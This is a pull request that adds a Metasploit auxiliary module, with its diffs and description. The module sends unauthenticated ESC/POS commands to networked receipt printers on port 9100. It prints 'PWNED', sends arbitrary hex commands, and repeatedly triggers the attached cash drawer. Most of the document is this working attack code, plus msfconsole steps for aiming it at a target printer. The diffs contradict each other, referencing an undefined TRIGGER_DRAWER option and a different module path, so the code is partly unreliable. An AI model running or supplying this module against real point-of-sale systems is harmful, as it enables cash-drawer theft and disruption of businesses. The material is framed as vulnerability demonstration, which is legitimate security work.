### PR TITLE
Add ESC/POS Printer Command Injector auxiliary module with optional drawer trigger

### DIFF
--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -8,9 +8,9 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'ESC/POS Printer Command Injector',
       'Description' => %q{
-        This module sends arbitrary ESC/POS commands to a network printer over TCP.
+        This module demonstrates an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers (CVE submitted). 
         By default, it prints "PWNED" and triggers the attached cash drawer twice.
-        You can override the print message or provide custom hex commands.
+        You can override the print message, provide custom hex commands, or choose to skip sending commands for safe testing.
       },
       'Author'      => ['FutileSkills'],
       'License'     => MSF_LICENSE
@@ -18,10 +18,11 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RHOST(),                # Target IP
-        Opt::RPORT(9100),            # Default printer port
+        Opt::RHOST(),                                      # Target IP
+        Opt::RPORT(9100),                                  # Default printer port
         OptString.new('MESSAGE', [true, 'Message to print', 'PWNED']),
-        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing'])
+        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing']),
+        OptBool.new('RUN_EXPLOIT', [true, 'Whether to actually send commands to the printer', true])
       ]
     )
   end
@@ -30,44 +31,49 @@ class MetasploitModule < Msf::Auxiliary
   DRAWER_COMMAND = "\x1b\x70\x00\x19\x32"
 
   def run
+    rhost_ip = rhost
     message = datastore['MESSAGE']
     hex_commands = datastore['HEX_COMMANDS']
+    run_exploit = datastore['RUN_EXPLOIT']
 
-    # If custom hex commands are provided, convert them from escaped string to actual bytes
-    if hex_commands && !hex_commands.empty?
+    if run_exploit
+      # Send custom hex commands before default sequence
+      if hex_commands && !hex_commands.empty?
+        begin
+          custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+          connect
+          sock.put(custom_bytes)
+          disconnect
+          print_status("Sent custom HEX_COMMANDS to #{rhost_ip}")
+        rescue => e
+          print_error("Failed to send HEX_COMMANDS: #{e}")
+        end
+      end
+
+      # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
+      print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
+
       begin
-        # Replace \xNN sequences with actual bytes
-        custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+        print_status("Sending print message to #{rhost_ip}...")
         connect
-        sock.put(custom_bytes)
+        sock.put(print_commands)
         disconnect
-        print_status("Sent custom hex commands to #{rhost}")
-      rescue => e
-        print_error("Failed to send HEX_COMMANDS: #{e}")
+
+        sleep(1)
+
+        2.times do
+          connect
+          sock.put(DRAWER_COMMAND)
+          disconnect
+          sleep(0.5)
+        end
+
+        print_good("Finished sending commands to #{rhost_ip}")
+      rescue ::Rex::ConnectionError
+        print_error("Failed to connect to #{rhost_ip}")
       end
-    end
-
-    # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
-    print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
-
-    begin
-      print_status("Sending print message to #{rhost}...")
-      connect
-      sock.put(print_commands)
-      disconnect
-
-      sleep(1)
-
-      2.times do
-        connect
-        sock.put(DRAWER_COMMAND)
-        disconnect
-        sleep(0.5)
-      end
-
-      print_good("Finished sending commands to #{rhost}")
-    rescue ::Rex::ConnectionError
-      print_error("Failed to connect to #{rhost}")
+    else
+      print_status("RUN_EXPLOIT is false; skipping sending commands to #{rhost_ip}")
     end
   end
 end

--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -1,0 +1,73 @@
+# encoding: utf-8
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ESC/POS Printer Command Injector',
+      'Description' => %q{
+        This module sends arbitrary ESC/POS commands to a network printer over TCP.
+        By default, it prints "PWNED" and triggers the attached cash drawer twice.
+        You can override the print message or provide custom hex commands.
+      },
+      'Author'      => ['FutileSkills'],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(),                # Target IP
+        Opt::RPORT(9100),            # Default printer port
+        OptString.new('MESSAGE', [true, 'Message to print', 'PWNED']),
+        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing'])
+      ]
+    )
+  end
+
+  # Cash drawer command
+  DRAWER_COMMAND = "\x1b\x70\x00\x19\x32"
+
+  def run
+    message = datastore['MESSAGE']
+    hex_commands = datastore['HEX_COMMANDS']
+
+    # If custom hex commands are provided, convert them from escaped string to actual bytes
+    if hex_commands && !hex_commands.empty?
+      begin
+        # Replace \xNN sequences with actual bytes
+        custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+        connect
+        sock.put(custom_bytes)
+        disconnect
+        print_status("Sent custom hex commands to #{rhost}")
+      rescue => e
+        print_error("Failed to send HEX_COMMANDS: #{e}")
+      end
+    end
+
+    # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
+    print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
+
+    begin
+      print_status("Sending print message to #{rhost}...")
+      connect
+      sock.put(print_commands)
+      disconnect
+
+      sleep(1)
+
+      2.times do
+        connect
+        sock.put(DRAWER_COMMAND)
+        disconnect
+        sleep(0.5)
+      end
+
+      print_good("Finished sending commands to #{rhost}")
+    rescue ::Rex::ConnectionError
+      print_error("Failed to connect to #{rhost}")
+    end
+  end
+end

--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -61,12 +61,14 @@ class MetasploitModule < Msf::Auxiliary
         sock.put(print_commands)
         disconnect
 
-        # Optionally trigger the drawer
+        # Optionally trigger the drawer (send twice with short delay)
         if trigger_drawer
-          sleep(1)
-          connect
-          sock.put(DRAWER_COMMAND)
-          disconnect
+          2.times do
+            connect
+            sock.put(DRAWER_COMMAND)
+            disconnect
+            sleep(0.5)
+          end
           print_status("Triggered cash drawer on #{rhost_ip}")
         end
 


### PR DESCRIPTION
**Tell us what this change does:**
This PR adds a new **auxiliary module**: `ESC/POS Printer Command Injector`.
It demonstrates an **unauthenticated ESC/POS command vulnerability** in networked Epson-compatible printers (CVE submitted).

By default, the module prints `"PWNED"` and optionally triggers the cash drawer.
It also allows sending **custom ESC/POS hex commands** before printing.
The module includes boolean options `RUN_EXPLOIT` (to skip sending commands) and `TRIGGER_DRAWER` (to trigger the drawer only if desired).

This module is intended to **demonstrate and test the security impact** of the vulnerability safely, while giving full control over which actions are executed.

**Verification:**

1. Start `msfconsole`.
2. `use auxiliary/admin/printer/escpos_printer_command_injector`
3. Set the target printer IP: `set RHOST <printer_ip>`
4. Optional: set a custom print message: `set MESSAGE "Metasploit Rocks"`
5. Optional: send custom hex commands: `set HEX_COMMANDS "\x1b\x61\x01"`
6. Optional: enable cash drawer: `set TRIGGER_DRAWER true`
7. Optional: skip sending commands for testing: `set RUN_EXPLOIT false`
8. Run the module: `run` or `exploit`
9. **Verify** the printer prints the message.
10. **Verify** the drawer triggers only if `TRIGGER_DRAWER` is `true`.
11. **Verify** no commands are sent if `RUN_EXPLOIT` is `false`.

**Demo / CVE Status:**
I can provide a video demonstration of this module successfully executing against a test printer and cash drawer.  
The CVE for this vulnerability is currently pending; I will update this PR with the CVE number once it is officially assigned. (If I'm lucky )

